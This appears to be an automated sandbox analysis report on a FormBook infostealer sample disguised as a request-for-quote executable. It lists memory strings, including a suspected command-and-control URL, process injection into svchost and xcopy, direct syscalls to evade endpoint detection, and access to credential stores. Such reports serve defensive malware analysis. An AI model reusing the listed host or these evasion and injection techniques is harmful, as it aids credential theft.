            Source: xcopy.exe, 00000005.00000002.4155874511.0000000008268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: xcopy.exe, 00000005.00000002.4155874511.0000000008268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: xcopy.exe, 00000005.00000002.4155874511.0000000008268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: xcopy.exe, 00000005.00000002.4155874511.0000000008268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: xcopy.exe, 00000005.00000002.4153994919.00000000046C8000.00000004.10000000.00040000.00000000.sdmp, pQIuyzclQg.exe, 00000007.00000002.4153187157.0000000003248000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Poppins:400
            Source: xcopy.exe, 00000005.00000002.4151955066.0000000003414000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: xcopy.exe, 00000005.00000002.4151955066.0000000003414000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: xcopy.exe, 00000005.00000002.4151955066.0000000003414000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: xcopy.exe, 00000005.00000002.4151955066.0000000003414000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: xcopy.exe, 00000005.00000002.4151955066.0000000003414000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: xcopy.exe, 00000005.00000002.4151955066.0000000003414000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: xcopy.exe, 00000005.00000003.2141249172.000000000824E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: xcopy.exe, 00000005.00000002.4155874511.0000000008268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: xcopy.exe, 00000005.00000002.4153994919.0000000004536000.00000004.10000000.00040000.00000000.sdmp, pQIuyzclQg.exe, 00000007.00000002.4153187157.00000000030B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.shintow.net/ow7i/?n8C0=D6NwXqVIZVbqudPYhEefTgY6OVxwomDj7EaXwER037qfX6kPuWmDYfQvQA/Ze

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000005.00000002.4153059351.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4154874640.0000000004F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4152996969.0000000003530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1959351183.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4152909168.0000000002A60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1960343452.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1963116108.0000000007090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4151604059.0000000003100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: RFQ 3100185 MAHAD.exe
            Source: RFQ 3100185 MAHAD.exe, 00000000.00000003.1706710919.00000000041BD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ 3100185 MAHAD.exe
            Source: RFQ 3100185 MAHAD.exe, 00000000.00000003.1707603383.0000000004013000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ 3100185 MAHAD.exe
            Source: RFQ 3100185 MAHAD.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@16/10
            Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeFile created: C:\Users\user\AppData\Local\Temp\aut3F0E.tmpJump to behavior
            Source: RFQ 3100185 MAHAD.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: xcopy.exe, 00000005.00000002.4151955066.0000000003478000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000005.00000003.2145520428.0000000003478000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: RFQ 3100185 MAHAD.exeReversingLabs: Detection: 55%
            Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeFile read: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe "C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe"
            Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe"
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeProcess created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"
            Source: C:\Windows\SysWOW64\xcopy.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe"Jump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeProcess created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ifsutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Binary string: xcopy.pdbUGP source: svchost.exe, 00000001.00000003.1928579132.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1928453654.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1928551112.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, pQIuyzclQg.exe, 00000003.00000002.4152174252.0000000000D28000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: pQIuyzclQg.exe, 00000003.00000000.1883063288.0000000000F3E000.00000002.00000001.01000000.00000005.sdmp, pQIuyzclQg.exe, 00000007.00000000.2029265327.0000000000F3E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: RFQ 3100185 MAHAD.exe, 00000000.00000003.1701564158.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp, RFQ 3100185 MAHAD.exe, 00000000.00000003.1704737176.0000000004090000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1860787517.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1858754141.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1959797800.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1959797800.000000000339E000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000005.00000003.1959723191.000000000363D000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000005.00000002.4153371400.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000005.00000002.4153371400.0000000003990000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000005.00000003.1962362076.00000000037E2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RFQ 3100185 MAHAD.exe, 00000000.00000003.1701564158.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp, RFQ 3100185 MAHAD.exe, 00000000.00000003.1704737176.0000000004090000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1860787517.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1858754141.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1959797800.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1959797800.000000000339E000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000005.00000003.1959723191.000000000363D000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000005.00000002.4153371400.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000005.00000002.4153371400.0000000003990000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000005.00000003.1962362076.00000000037E2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: xcopy.pdb source: svchost.exe, 00000001.00000003.1928579132.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1928453654.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1928551112.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, pQIuyzclQg.exe, 00000003.00000002.4152174252.0000000000D28000.00000004.00000020.00020000.00000000.sdmp
            Source: RFQ 3100185 MAHAD.exeStatic PE information: real checksum: 0xa961f should be: 0xf04fe
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeAPI/Special instruction interceptor: Address: 12BB2C4
            Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\xcopy.exeWindow / User API: threadDelayed 4742Jump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeWindow / User API: threadDelayed 5230Jump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exe TID: 7924Thread sleep count: 4742 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exe TID: 7924Thread sleep time: -9484000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exe TID: 7924Thread sleep count: 5230 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exe TID: 7924Thread sleep time: -10460000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe TID: 7952Thread sleep time: -85000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe TID: 7952Thread sleep count: 37 > 30Jump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe TID: 7952Thread sleep time: -55500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe TID: 7952Thread sleep count: 41 > 30Jump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe TID: 7952Thread sleep time: -41000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\xcopy.exeLast function: Thread delayed
            Source: firefox.exe, 00000008.00000002.2256006775.0000017B2AEAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
            Source: RFQ 3100185 MAHAD.exe, 00000000.00000003.1708709621.0000000000ADF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: pQIuyzclQg.exe, 00000007.00000002.4152394161.0000000000B50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJ
            Source: xcopy.exe, 00000005.00000002.4151955066.0000000003403000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess queried: DebugPortJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe protection: execute and read and writeJump to behavior
